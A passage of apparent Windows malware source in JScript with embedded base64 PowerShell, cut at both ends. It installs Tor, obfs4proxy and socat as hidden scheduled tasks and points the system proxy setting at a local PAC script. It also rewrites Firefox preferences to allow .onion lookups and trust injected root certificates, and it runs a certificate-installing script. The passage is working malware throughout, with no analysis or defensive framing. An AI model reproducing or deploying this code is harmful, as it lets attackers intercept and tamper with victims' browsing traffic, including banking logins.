VcV293NjQzMk5vZGVcTW96aWxsYVxNb3ppbGxhIEZpcmVmb3giLCBmYWxzZSk7DQoNCiAgICAgICAgaWYgKGxvY2FsTWFjaGluZTEgIT0gbnVsbCkNCiAgICAgICAgew0KICAgICAgICAgICAgdHJ5DQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgc3RyaW5nW10gaW5zdGFsbGVkVmVyc2lvbnMgPSBsb2NhbE1hY2hpbmUxLkdldFN1YktleU5hbWVzKCk7DQogICAgICAgICAgICAgICAgLy8gd2UnbGwgdGFrZSB0aGUgZmlyc3QgaW5zdGFsbGVkIHZlcnNpb24sIHBlb3BsZSBub3JtYWxseSBvbmx5IGhhdmUgb25lDQogICAgICAgICAgICAgICAgaWYgKGluc3RhbGxlZFZlcnNpb25zLkxlbmd0aCA9PSAwKQ0KICAgICAgICAgICAgICAgICAgICB0aHJvdyBuZXcgSW5kZXhPdXRPZlJhbmdlRXhjZXB0aW9uKCJObyBpbnN0YWxscyBvZiBmaXJlZm94IHJlY29yZGVkIGluIGl0cyBrZXkuIik7DQoNCiAgICAgICAgICAgICAgICBSZWdpc3RyeUtleSBtYWluSW5zdGFsbCA9IGxvY2FsTWFjaGluZTEuT3BlblN1YktleShpbnN0YWxsZWRWZXJzaW9uc1swXSk7DQoNCiAgICAgICAgICAgICAgICAvLyBnZXQgaW5zdGFsbCBkaXJlY3RvcnkNCiAgICAgICAgICAgICAgICBzdHJpbmcgaW5zdGFsbFN0cmluZyA9IChzdHJpbmcpbWFpbkluc3RhbGwuT3BlblN1YktleSgiTWFpbiIpLkdldFZhbHVlKCJJbnN0YWxsIERpcmVjdG9yeSIsIG51bGwpOw0KDQogICAgICAgICAgICAgICAgaWYgKGluc3RhbGxTdHJpbmcgPT0gbnVsbCkNCiAgICAgICAgICAgICAgICAgICAgdGhyb3cgbmV3IE51bGxSZWZlcmVuY2VFeGNlcHRpb24oIkluc3RhbGwgc3RyaW5nIHdhcyBudWxsIik7DQoNCiAgICAgICAgICAgICAgICBmcCA9IG5ldyBEaXJlY3RvcnlJbmZvKGluc3RhbGxTdHJpbmcpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgY2F0Y2ggKEV4Y2VwdGlvbikNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICBlbHNlIGlmIChsb2NhbE1hY2hpbmUyICE9IG51bGwpDQogICAgICAgIHsNCiAgICAgICAgICAgIHRyeQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIHN0cmluZ1tdIGluc3RhbGxlZFZlcnNpb25zID0gbG9jYWxNYWNoaW5lMi5HZXRTdWJLZXlOYW1lcygpOw0KICAgICAgICAgICAgICAgIC8vIHdlJ2xsIHRha2UgdGhlIGZpcnN0IGluc3RhbGxlZCB2ZXJzaW9uLCBwZW9wbGUgbm9ybWFsbHkgb25seSBoYXZlIG9uZQ0KICAgICAgICAgICAgICAgIGlmIChpbnN0YWxsZWRWZXJzaW9ucy5MZW5ndGggPT0gMCkNCiAgICAgICAgICAgICAgICAgICAgdGhyb3cgbmV3IEluZGV4T3V0T2ZSYW5nZUV4Y2VwdGlvbigiTm8gaW5zdGFsbHMgb2YgZmlyZWZveCByZWNvcmRlZCBpbiBpdHMga2V5LiIpOw0KDQogICAgICAgICAgICAgICAgUmVnaXN0cnlLZXkgbWFpbkluc3RhbGwgPSBsb2NhbE1hY2hpbmUyLk9wZW5TdWJLZXkoaW5zdGFsbGVkVmVyc2lvbnNbMF0pOw0KDQogICAgICAgICAgICAgICAgLy8gZ2V0IGluc3RhbGwgZGlyZWN0b3J5DQogICAgICAgICAgICAgICAgc3RyaW5nIGluc3RhbGxTdHJpbmcgPSAoc3RyaW5nKW1haW5JbnN0YWxsLk9wZW5TdWJLZXkoIk1haW4iKS5HZXRWYWx1ZSgiSW5zdGFsbCBEaXJlY3RvcnkiLCBudWxsKTsNCg0KICAgICAgICAgICAgICAgIGlmIChpbnN0YWxsU3RyaW5nID09IG51bGwpDQogICAgICAgICAgICAgICAgICAgIHRocm93IG5ldyBOdWxsUmVmZXJlbmNlRXhjZXB0aW9uKCJJbnN0YWxsIHN0cmluZyB3YXMgbnVsbCIpOw0KICAgICAgICAgICAgICAgIGZwID0gbmV3IERpcmVjdG9yeUluZm8oaW5zdGFsbFN0cmluZyk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIHJldHVybiBmcDsNCiAgICB9DQp9DQoiQDsNCltGRl06OkdldEluc3RhbmNlKCkuU3RhcnQoIiVDRVJUJSIpOw0KfQ0KQWRkQ2VydEZG", 18 | pstp: "ZnVuY3Rpb24gVW56aXANCnsNCnBhcmFtKFtzdHJpbmddJHppcGZpbGUsIFtzdHJpbmddJGRlc3RpbmF0aW9uKTsNCiQ3eiA9IEpvaW4tUGF0aCAkZW52OlRlbXAgJzd6YS5leGUnOw0KaWYgKC1OT1QgKFRlc3QtUGF0aCAkN3opKXsNClRyeQ0Kew0KKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9jaG9jb2xhdGV5Lm9yZy83emEuZXhlJywkN3opOw0KfQ0KQ2F0Y2h7fQ0KfQ0KaWYgKCQoVHJ5IHsgVGVzdC1QYXRoICQ3ei50cmltKCkgfSBDYXRjaCB7ICRmYWxzZSB9KSl7DQpTdGFydC1Qcm9jZXNzICIkN3oiIC1Bcmd1bWVudExpc3QgInggLW9gIiRkZXN0aW5hdGlvbmAiIC15IGAiJHppcGZpbGVgIiIgLVdhaXQgLU5vTmV3V2luZG93DQp9DQplbHNlew0KJHNoZWxsID0gbmV3LW9iamVjdCAtY29tIHNoZWxsLmFwcGxpY2F0aW9uOw0KJHppcCA9ICRzaGVsbC5OYW1lU3BhY2UoJHppcGZpbGUpOw0KZm9yZWFjaCgkaXRlbSBpbiAkemlwLml0ZW1zKCkpDQp7DQokc2hlbGwuTmFtZXNwYWNlKCRkZXN0aW5hdGlvbikuY29weWhlcmUoJGl0ZW0pOw0KfQ0KfQ0KfQ0KZnVuY3Rpb24gQmFzZTY0VG9GaWxlDQp7DQpwYXJhbShbc3RyaW5nXSRmaWxlLCBbc3RyaW5nXSRzdHJpbmcpOw0KJGJ5dGVzPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cmluZyk7DQojc2V0LWNvbnRlbnQgLWVuY29kaW5nIGJ5dGUgJGZpbGUgLXZhbHVlICRieXRlczsNCltJTy5GaWxlXTo6V3JpdGVBbGxCeXRlcygkZmlsZSwgJGJ5dGVzKTsNCn0NCmZ1bmN0aW9uIEFkZFRhc2sNCnsNCnBhcmFtKFtzdHJpbmddJG5hbWUsIFtzdHJpbmddJGNtZCwgW3N0cmluZ10kcGFyYW1zPScnLFtpbnRdJHJlc3RhcnQ9MCxbaW50XSRkZWxheT0wLFtzdHJpbmddJGRpcj0nJyk7DQokdHM9TmV3LU9iamVjdCBNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5UYXNrU2VydmljZTsNCiR0ZD0kdHMuTmV3VGFzaygpOw0KJHRkLlJlZ2lzdHJhdGlvbkluZm8uRGVzY3JpcHRpb24gPSAnRG9lcyBzb21ldGhpbmcnOw0KJHRkLlNldHRpbmdzLkRpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzID0gJEZhbHNlOw0KJHRkLlNldHRpbmdzLlN0b3BJZkdvaW5nT25CYXR0ZXJpZXMgPSAkRmFsc2U7DQokdGQuU2V0dGluZ3MuTXVsdGlwbGVJbnN0YW5jZXMgPSBbTWljcm9zb2Z0LldpbjMyLlRhc2tTY2hlZHVsZXIuVGFza0luc3RhbmNlc1BvbGljeV06Oklnbm9yZU5ldzsNCiRMb2dvblRyaWdnZXIgPSBOZXctT2JqZWN0IE1pY3Jvc29mdC5XaW4zMi5UYXNrU2NoZWR1bGVyLkxvZ29uVHJpZ2dlcjsNCiRMb2dvblRyaWdnZXIuU3RhcnRCb3VuZGFyeT1bU3lzdGVtLkRhdGVUaW1lXTo6Tm93Ow0KJExvZ29uVHJpZ2dlci5Vc2VySWQ9JGVudjp1c2VybmFtZTsNCiRMb2dvblRyaWdnZXIuRGVsYXk9W1N5c3RlbS5UaW1lU3Bhbl06OkZyb21TZWNvbmRzKCRkZWxheSk7DQokdGQuVHJpZ2dlcnMuQWRkKCRMb2dvblRyaWdnZXIpOw0KaWYoJHJlc3RhcnQgLWVxIDEpew0KJFRpbWVUcmlnZ2VyID0gTmV3LU9iamVjdCBNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5UaW1lVHJpZ2dlcjsNCiRUaW1lVHJpZ2dlci5TdGFydEJvdW5kYXJ5PVtTeXN0ZW0uRGF0ZVRpbWVdOjpOb3c7DQokVGltZVRyaWdnZXIuUmVwZXRpdGlvbi5JbnRlcnZhbD1bU3lzdGVtLlRpbWVTcGFuXTo6RnJvbU1pbnV0ZXMoMjApOw0KJFRpbWVUcmlnZ2VyLlJlcGV0aXRpb24uU3RvcEF0RHVyYXRpb25FbmQ9JEZhbHNlOw0KJHRkLlRyaWdnZXJzLkFkZCgkVGltZVRyaWdnZXIpOw0KfQ0KJEV4ZWNBY3Rpb249TmV3LU9iamVjdCBNaWNyb3NvZnQuV2luMzIuVGFza1NjaGVkdWxlci5FeGVjQWN0aW9uKCRjbWQsJHBhcmFtcywkZGlyKTsNCiR0ZC5BY3Rpb25zLkFkZCgkRXhlY0FjdGlvbik7DQokdGFzaz0kdHMuUm9vdEZvbGRlci5SZWdpc3RlclRhc2tEZWZpbml0aW9uKCRuYW1lLCAkdGQpOw0KJHRhc2suUnVuKCk7DQp9DQpmdW5jdGlvbiBJVFB7DQokRmlsZT0kZW52OlRlbXArJ1x0cy56aXAnOw0KJERlc3Q9JGVudjpUZW1wKydcdHMnOw0KKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9hcGkubnVnZXQub3JnL3BhY2thZ2VzL3Rhc2tzY2hlZHVsZXIuMi41LjI2Lm51cGtnJywkRmlsZSk7DQppZiAoKFRlc3QtUGF0aCAkRGVzdCkgLWVxIDEpe3JtIC1Gb3JjZSAtUmVjdXJzZSAkRGVzdDt9bWQgJERlc3QgfCBPdXQtTnVsbDsNClVuemlwICRGaWxlICREZXN0Ow0Kcm0gLUZvcmNlICRGaWxlOw0KJFRTQXNzZW1ibHk9JERlc3QrJ1xsaWJcbmV0MjBcTWljcm9zb2Z0LldpbjMyLlRhc2tTY2hlZHVsZXIuZGxsJzsNCiRsb2FkTGliID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZEZpbGUoJFRTQXNzZW1ibHkpOw0KJFRGaWxlPSRlbnY6VGVtcCsnXHQuemlwJzsNCiREZXN0VFA9JGVudjpBUFBEQVRBKydcTVMnOw0KKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9kaXN0LnRvcnByb2plY3Qub3JnL3RvcmJyb3dzZXIvNy4wL3Rvci13aW4zMi0wLjMuMC43LnppcCcsJFRGaWxlKTsNCmlmICgoVGVzdC1QYXRoICREZXN0VFApIC1lcSAxKXtybSAtRm9yY2UgLVJlY3Vyc2UgJERlc3RUUDt9bWQgJERlc3RUUCB8IE91dC1OdWxsOw0KVW56aXAgJFRGaWxlICREZXN0VFA7DQpybSAtRm9yY2UgJFRGaWxlOw0KJHRvcj0kRGVzdFRQKydcVG9yXHRvci5leGUnOw0KJG9iZnM0PSREZXN0VFArJ1xUb3Jcb2JmczRwcm94eS5leGUnOw0KKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9naXRodWIuY29tL2dhcmV0aGZsb3dlcnMvdG9yLWJyb3dzZXItcG9ydGFibGUvcmF3L21hc3Rlci9Ub3JCcm93c2VyUG9ydGFibGUvQXBwL1RvckJyb3dzZXIvVG9yQnJvd3Nlci9Ub3IvUGx1Z2dhYmxlVHJhbnNwb3J0cy9vYmZzNHByb3h5LmV4ZScsJG9iZnM0KTsNCmlmICgkKFRyeSB7IFRlc3QtUGF0aCAkb2JmczQudHJpbSgpIH0gQ2F0Y2ggeyAkZmFsc2UgfSkpew0KJHRvcl9kaXI9JGVudjpBUFBEQVRBKydcdG9yJzsNCmlmICgoVGVzdC1QYXRoICR0b3JfZGlyKSAtZXEgMSl7cm0gLUZvcmNlIC1SZWN1cnNlICR0b3JfZGlyO31tZCAkdG9yX2RpciB8IE91dC1OdWxsOw0KJHRvcnJjPSR0b3JfZGlyKydcdG9ycmMnOw0KQmFzZTY0VG9GaWxlICR0b3JyYyAnVlhObFFuSnBaR2RsY3lBeERRcERiR2xsYm5SVWNtRnVjM0J2Y25SUWJIVm5hVzRnYjJKbWN6UWdaWGhsWXlCdlltWnpOSEJ5YjNoNUxtVjRaU0J0WVc1aFoyVmtEUXBDY21sa1oyVWdiMkptY3pRZ01UazBMakV6TWk0eU1Ea3VNVFUwT2pVNU9EZzRJRUk0TXpkRlJqQXpPRE5ETUVJeE16TXdRVGs0TjBJNVF6VkVSa0kyUmpKRFFrUkJNelZEUVVFZ1kyVnlkRDF4UzBwV2QyTnpaSGhGYkZCNlRXSnZkekl4Y205cVNGSkRRbHBrZUVGa2QzVjRXRzVSVlRGc1p5OXpPVWxHTldWb0t6ZDFhV2x0WW5CclZFVjNVbGgxVFZSRlVsUjNJR2xoZEMxdGIyUmxQVEFOQ2tKeWFXUm5aU0J2WW1aek5DQTBOUzQxTlM0eExqYzBPamswTkRNZ05rWXhPRVpGUmtKQ01FTkJSVU5FTlVGQ1FUYzFOVE14TWtaRFEwSXpORVpETVRGQk4wRkNPQ0JqWlhKMFBYYzRTQzk0Tm1sblEzaHNhV2RpUmpKWVFrbGplRTVGVjNFcmVtbFZPV2d4TlhKMGQybHJPREp2UVhGT1dGcDNTakkxYjBoM1lXeDZVbGxMTlZkUFNrbEJaVXRqUTFFZ2FXRjBMVzF2WkdVOU1BMEtRbkpwWkdkbElHOWlabk0wSURNNExqSXlPUzR6TXk0eE5EWTZORFE1TlRBZ09UWTVSREEzTVVKRU9EbEJOamhETVRVNU5Ea3hOVFpEUkRGRFFUSTVRVE16UVVZMk16VkRNaUJqWlhKMFBYWmlZV2cyYWtSclMxTXdUbEp4VnpGNFowdG5Oa3RrTTFWdWNqRlFNVEkxZGtSMlJEbEdZbGx2WkZvdlpuTnhVUzlOVjBSTE1qYzNVRTVCU21sSGRXUjZTRVZDUjJjZ2FXRjBMVzF2WkdVOU1RMEtRbkpwWkdkbElHOWlabk0wSURFNU5DNHhNekl1TWpBNUxqRTVPalF4TkRjNElEYzRNMFV5TnpaRE5qZzRPVUpHTnpNNU1EZEdNamsxUVVFNU16SXhPVVkzTnpZeVFrSTVNRFlnWTJWeWREMXZSREJKZURWUVQzSlNUVmRGTUVZMFlYUnpORlJUWWxaSWR5dDRNelVyUTJWWFpYTnZiVGhUTlZKNGNqbFdObVJVVG05dldHSTFVV1ZpUlVsR1RHVTNPRmxwWTB4M0lHbGhkQzF0YjJSbFBUQU5Da0p5YVdSblpTQnZZbVp6TkNBeE9USXVNell1TXpFdU1USXlPalEwT1RrMElEWXpSalV4TmpnNFFqTTRPVFkyTmtSQ01FWXdOVFUyUXpVMlJUazNPVFV4TmtReVFqbEVNemdnWTJWeWREMVJTMWhKUW1jcmNtVTNaa3hwYlcxQ1RXSktiblJpVlRkM2QzY3dWV0V4UTJaUFZTOVlLMWxWYzFBeFNUTk9jM0ZMVWtOS1dEbFhWRFpSVkdFNVNHMXRlR2t4T0ZobklHbGhkQzF0YjJSbFBUQU5Da0p5YVdSblpTQnZZbVp6TkNBMU5DNHlNREl1TVRNMUxqRTFPamswTkRNZ016ZEVOakV4UmpKRE1UTkNPREEyTjBaRU56SkRNemszTURaQ1F6RTFORU5HTWtNNE16azNPQ0JqWlhKMFBVNUxWM0ZKYm1SMk5WQjZaREY2WW5GSUt6YzRUekJGVTFVM2N6SmhObU5qS3pab09URk9Zbk56YlhObWVqVlVUWEF4V0ZkeGNXVndlbGg0VGtOMWVFaEZlRmcwUWtFZ2FXRjBMVzF2WkdVOU1BMEtRbkpwWkdkbElHOWlabk0wSURNMUxqRTROeTR5TVRZdU1qTXdPamswTkRNZ016VTBOMFpHUmpsR05rRkdOVEV3T1RORk1USTVNRVZDT1RFd01UazVRVGRGT1RJd09EVXhNaUJqWlhKMFBWZGpXRkl6WmtWSVpVRjNOV0pJU2pOU2NYSXZka0ZvVEhwNVpDOVhMM2N3WW1semJrOWpabXh0WXk5SVUwTmlUVFZHV1hGMFVWRkdaRTlPYkVsMVozZGtTMjA1WlhjZ2FXRjBMVzF2WkdVOU1BMEtRbkpwWkdkbElHOWlabk0wSURFd09TNDNOQzR4T1RndU1qVXlPak0zTnpjeElEZ3hOamRHTWpJMU5EQTFRa1pCTnpFMk16TkNSREpDUXpWQ09EVTVPVUV4UVRneU4wWkRSak1nWTJWeWREMDRaa3RVWTJ4bmRVeEpObloxUkU1eWJGUlNjbFpxTkRaMk1qTk9XVkZVY3pKVVZVRndTWEJ1WVhrMU1raFZWVUlyY1VaNFZYcEhhVE50YTJvcmRFdzVieXRUUTFwM0lHbGhkQzF0YjJSbFBUQU5DZz09JzsNCn0NCiR0b3I9JHRvci5SZXBsYWNlKCdcJywnLycpOw0KJHRvcl9jbWQ9ImAiamF2YXNjcmlwdDpjbG9zZShuZXcgQWN0aXZlWE9iamVjdCgnV1NjcmlwdC5TaGVsbCcpLlJ1bignJHRvcicsMCxmYWxzZSkpYCIiOw0KQWRkVGFzayAnU1VUJyAnbXNodGEuZXhlJyAkdG9yX2NtZDsNCiRTRmlsZT0kZW52OlRlbXArJ1xzLnppcCc7DQooTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwczovL2dpdGh1Yi5jb20vU3R1ZGlvRXRyYW5nZS9zb2NhdC13aW5kb3dzL2FyY2hpdmUvMS43LjIuMS56aXAnLCRTRmlsZSk7DQpVbnppcCAkU0ZpbGUgJERlc3RUUDsNCiRzX29sZD0kRGVzdFRQKydcc29jYXQtd2luZG93cy0xLjcuMi4xXCc7DQpybSAtRm9yY2UgJFNGaWxlOw0KUmVuYW1lLUl0ZW0gLXBhdGggJHNfb2xkIC1uZXdOYW1lICdzJzsNCiRzX2ZvbGQ9JERlc3RUUCsnXHNcJzsNCiRzMWNtZD0nc29jYXQgdGNwNC1MSVNURU46NTU1NSxyZXVzZWFkZHIsZm9yayxrZWVwYWxpdmUsYmluZD0xMjcuMC4wLjEgU09DS1M0QToxMjcuMC4wLjE6JURPTUFJTiU6ODAsc29ja3Nwb3J0PTkwNTAnOw0KJHMyY21kPSdzb2NhdCB0Y3A0LUxJU1RFTjo1NTg4LHJldXNlYWRkcixmb3JrLGtlZXBhbGl2ZSxiaW5kPTEyNy4wLjAuMSBTT0NLUzRBOjEyNy4wLjAuMTolRE9NQUlOJTo1NTg4LHNvY2tzcG9ydD05MDUwJzsNCiRzMV9jbWQ9ImAiamF2YXNjcmlwdDpjbG9zZShuZXcgQWN0aXZlWE9iamVjdCgnV1NjcmlwdC5TaGVsbCcpLlJ1bignJHMxY21kJywwLGZhbHNlKSlgIiI7DQokczJfY21kPSJgImphdmFzY3JpcHQ6Y2xvc2UobmV3IEFjdGl2ZVhPYmplY3QoJ1dTY3JpcHQuU2hlbGwnKS5SdW4oJyRzMmNtZCcsMCxmYWxzZSkpYCIiOw0KQWRkVGFzayAnTVJUJyAnbXNodGEuZXhlJyAkczFfY21kIDAgMCAkc19mb2xkOw0KQWRkVGFzayAnU0MnICdtc2h0YS5leGUnICRzMl9jbWQgMCAwICRzX2ZvbGQ7DQp9DQpJVFA=" 19 | }; 20 | var Base64 = { 21 | _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", 22 | encode: function(e) { 23 | var t = ""; 24 | var n, r, i, s, o, u, a; 25 | var f = 0; 26 | e = Base64._utf8_encode(e); 27 | while (f < e.length) { 28 | n = e.charCodeAt(f++); 29 | r = e.charCodeAt(f++); 30 | i = e.charCodeAt(f++); 31 | s = n >> 2; 32 | o = (n & 3) << 4 | r >> 4; 33 | u = (r & 15) << 2 | i >> 6; 34 | a = i & 63; 35 | if (isNaN(r)) { 36 | u = a = 64 37 | } else if (isNaN(i)) { 38 | a = 64 39 | } 40 | t = t + this._keyStr.charAt(s) + this._keyStr.charAt(o) + 41 | this._keyStr.charAt(u) + this._keyStr.charAt(a) 42 | } 43 | return t 44 | }, 45 | decode: function(e) { 46 | var t = ""; 47 | var n, r, i; 48 | var s, o, u, a; 49 | var f = 0; 50 | e = e.replace(/[^A-Za-z0-9+/=]/g, ""); 51 | while (f < e.length) { 52 | s = this._keyStr.indexOf(e.charAt(f++)); 53 | o = this._keyStr.indexOf(e.charAt(f++)); 54 | u = this._keyStr.indexOf(e.charAt(f++)); 55 | a = this._keyStr.indexOf(e.charAt(f++)); 56 | n = s << 2 | o >> 4; 57 | r = (o & 15) << 4 | u >> 2; 58 | i = (u & 3) << 6 | a; 59 | t = t + String.fromCharCode(n); 60 | if (u != 64) { 61 | t = t + String.fromCharCode(r) 62 | } 63 | if (a != 64) { 64 | t = t + String.fromCharCode(i) 65 | } 66 | } 67 | t = Base64._utf8_decode(t); 68 | return t 69 | }, 70 | _utf8_encode: function(e) { 71 | e = e.replace(/rn/g, "n"); 72 | var t = ""; 73 | for (var n = 0; n < e.length; n++) { 74 | var r = e.charCodeAt(n); 75 | if (r < 128) { 76 | t += String.fromCharCode(r) 77 | } else if (r > 127 && r < 2048) { 78 | t += String.fromCharCode(r >> 6 | 192); 79 | t += String.fromCharCode(r & 63 | 128) 80 | } else { 81 | t += String.fromCharCode(r >> 12 | 224); 82 | t += String.fromCharCode(r >> 6 & 63 | 128); 83 | t += String.fromCharCode(r & 63 | 128) 84 | } 85 | } 86 | return t 87 | }, 88 | _utf8_decode: function(e) { 89 | var t = ""; 90 | var n = 0; 91 | var r = c1 = c2 = 0; 92 | while (n < e.length) { 93 | r = e.charCodeAt(n); 94 | if (r < 128) { 95 | t += String.fromCharCode(r); 96 | n++ 97 | } else if (r > 191 && r < 224) { 98 | c2 = e.charCodeAt(n + 1); 99 | t += String.fromCharCode((r & 31) << 6 | c2 & 63); 100 | n += 2 101 | } else { 102 | c2 = e.charCodeAt(n + 1); 103 | c3 = e.charCodeAt(n + 2); 104 | t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 105 | 6 | c3 & 63); 106 | n += 3 107 | } 108 | } 109 | return t 110 | } 111 | }; 112 | var Help = { 113 | BinaryDataToFile: function(sFileName, bData) { 114 | var streamW = new ActiveXObject("ADODB.Stream"); 115 | streamW.Open(); 116 | streamW.Type = BINARY_STREAM_TYPE; 117 | var rs = new ActiveXObject("ADODB.Recordset"); 118 | var len = bData.length * 2; 119 | rs.Fields.Append("data", 204, len, 0x80); 120 | rs.Open(); 121 | rs.AddNew(); 122 | rs.Fields("data").AppendChunk(bData); 123 | rs.Update(); 124 | rs.MoveFirst(); 125 | var binArray = rs("data").GetChunk(len); 126 | rs.Close(); 127 | streamW.Write(binArray); 128 | streamW.Position = 0; 129 | if (fso.FileExists(sFileName)) { 130 | fso.DeleteFile(sFileName) 131 | } 132 | streamW.SaveToFile(sFileName); 133 | streamW.Close(); 134 | var outStreamA = new ActiveXObject("ADODB.Stream"); 135 | var outStreamB = new ActiveXObject("ADODB.Stream"); 136 | outStreamA.Type = TEXT_STREAM_TYPE; 137 | outStreamB.Type = TEXT_STREAM_TYPE; 138 | outStreamB.Charset = "ISO-8859-1"; 139 | outStreamA.Open(); 140 | outStreamB.Open(); 141 | outStreamA.LoadFromFile(sFileName); 142 | outStreamA.Position = 0; 143 | outStreamA.CopyTo(outStreamB); 144 | outStreamA.Close(); 145 | outStreamB.SaveToFile(sFileName, CREATE_OVERWRITE_SAVE_MODE); 146 | outStreamB.Close() 147 | }, 148 | RandomNumber: function(m, n) { 149 | m = parseInt(m, 10); 150 | n = parseInt(n, 10); 151 | return Math.floor(Math.random() * (n - m + 1)) + m 152 | }, 153 | GenStr: function(length, special) { 154 | var iteration = 0; 155 | var password = ""; 156 | var randomNumber; 157 | if (special === undefined) { 158 | special = false 159 | } 160 | while (iteration < length) { 161 | randomNumber = (Math.floor((Math.random() * 100)) % 94) + 162 | 33; 163 | if (!special) { 164 | if ((randomNumber >= 33) && (randomNumber <= 47)) { 165 | continue 166 | } 167 | if ((randomNumber >= 58) && (randomNumber <= 64)) { 168 | continue 169 | } 170 | if ((randomNumber >= 91) && (randomNumber <= 96)) { 171 | continue 172 | } 173 | if ((randomNumber >= 123) && (randomNumber <= 126)) { 174 | continue 175 | } 176 | } 177 | iteration++; 178 | password += String.fromCharCode(randomNumber) 179 | } 180 | return password 181 | }, 182 | trim: function(str) { 183 | return str.replace(/(^\s+)|(\s+$)/g, "") 184 | } 185 | }; 186 | if (!String.format) { 187 | String.format = function(format) { 188 | var args = Array.prototype.slice.call(arguments, 1); 189 | return format.replace(/{(\d+)}/g, function(match, number) { 190 | return typeof args[number] != "undefined" ? args[number] : 191 | match 192 | }) 193 | } 194 | } 195 | 196 | function C_IE() { 197 | this.FileName = Help.GenStr(8) + ".ps1"; 198 | this.GetIp = function() { 199 | var xhttp = new ActiveXObject("MSXML2.XMLHTTP"); 200 | try { 201 | xhttp.open("GET", "http://api.ipify.org/", false); 202 | xhttp.send(); 203 | if (xhttp.status == 200) { 204 | return Help.trim(xhttp.responseText) 205 | } 206 | } catch (e) {} 207 | try { 208 | xhttp.open("GET", "http://icanhazip.com/", false); 209 | xhttp.send(); 210 | if (xhttp.status == 200) { 211 | return Help.trim(xhttp.responseText) 212 | } 213 | } catch (e) { 214 | return "" 215 | } 216 | }; 217 | this.InstallPac = function() { 218 | wss.RegWrite(Base64.decode( 219 | "SEtDVVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm5ldCBTZXR0aW5nc1xBdXRvRGV0ZWN0" 220 | ), 0, "REG_DWORD"); 221 | for (var i = 0; i < 5; i++) { 222 | var sIp = this.GetIp(); 223 | if (sIp.length > 0) { 224 | this.WriteReg(String.format( 225 | "http://127.0.0.1:5555/{0}.js?ip={1}", Help.GenStr( 226 | 8), sIp)) 227 | } 228 | } 229 | }; 230 | this.WriteReg = function(s) { 231 | wss.RegWrite(Base64.decode( 232 | "SEtDVVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm5ldCBTZXR0aW5nc1xBdXRvQ29uZmlnVVJM" 233 | ), s, "REG_SZ") 234 | }; 235 | this.IC = function() { 236 | this.FileName = ENV_TEMP + "\\" + this.FileName; 237 | var bData = Base64.decode(Cfg.ps); 238 | bData = bData.replace("%CERT%", Cfg.cert); 239 | Help.BinaryDataToFile(this.FileName, bData); 240 | wss.Run("powershell -ExecutionPolicy Unrestricted -File \"" + this.FileName + 241 | "\"", 0, true) 242 | }; 243 | this.Close = function() { 244 | if (fso.FileExists(this.FileName)) { 245 | fso.DeleteFile(this.FileName) 246 | } 247 | } 248 | } 249 | 250 | function C_FF() { 251 | var StrFirefoxProfilesDir = ENV_APPDATA + "\\Mozilla\\Firefox\\Profiles"; 252 | this.FileName = Help.GenStr(8) + ".ps1"; 253 | this.GetProfile = function() { 254 | if (fso.FolderExists(StrFirefoxProfilesDir)) { 255 | var ArrFirefoxProfileList = fso.GetFolder(StrFirefoxProfilesDir) 256 | .SubFolders; 257 | if (ArrFirefoxProfileList.Count > 0) { 258 | var e = new Enumerator(ArrFirefoxProfileList); 259 | e.moveFirst(); 260 | while (e.atEnd() == false) { 261 | var folder = e.item(); 262 | if (folder.Name.indexOf(".default") > -1) { 263 | return folder.Path 264 | } 265 | e.moveNext() 266 | } 267 | } 268 | } 269 | return false 270 | }; 271 | this.InstallPac = function() { 272 | var StrProfile = this.GetProfile(); 273 | if (StrProfile != false) { 274 | var StrPrefsJs = StrProfile + Base64.decode("XHByZWZzLmpz"); 275 | if (fso.FileExists(StrPrefsJs)) { 276 | var StrContent = fso.OpenTextFile(StrPrefsJs, 1).ReadAll(); 277 | var ArrContent = StrContent.split("\n"); 278 | var NewArrContent = []; 279 | for (var i = 0; i < ArrContent.length; i++) { 280 | if (ArrContent[i].indexOf("network.dns.blockDotOnion") != 281 | -1) { 282 | ArrContent[i] = ArrContent[i].replace("true", 283 | "false") 284 | } 285 | if (ArrContent[i].indexOf("network.proxy.") == -1 && 286 | ArrContent[i].indexOf( 287 | "security.enterprise_roots.enabled") == -1) { 288 | NewArrContent.push(ArrContent[i]) 289 | } 290 | } 291 | NewArrContent.push( 292 | "user_pref(\"network.dns.blockDotOnion\", false);"); 293 | NewArrContent.push( 294 | "user_pref(\"security.enterprise_roots.enabled\", true);" 295 | ); 296 | StrContent = NewArrContent.join("\n"); 297 | var stream = fso.CreateTextFile(StrPrefsJs, true); 298 | stream.Write(StrContent); 299 | stream.Close() 300 | } 301 | } 302 | }; 303 | this.InstallCert = function() { 304 | this.FileName = ENV_TEMP + "\\" + this.FileName; 305 | var bData = Base64.decode(Cfg.psf); 306 | bData = bData.replace("%CERT%", Cfg.cert); 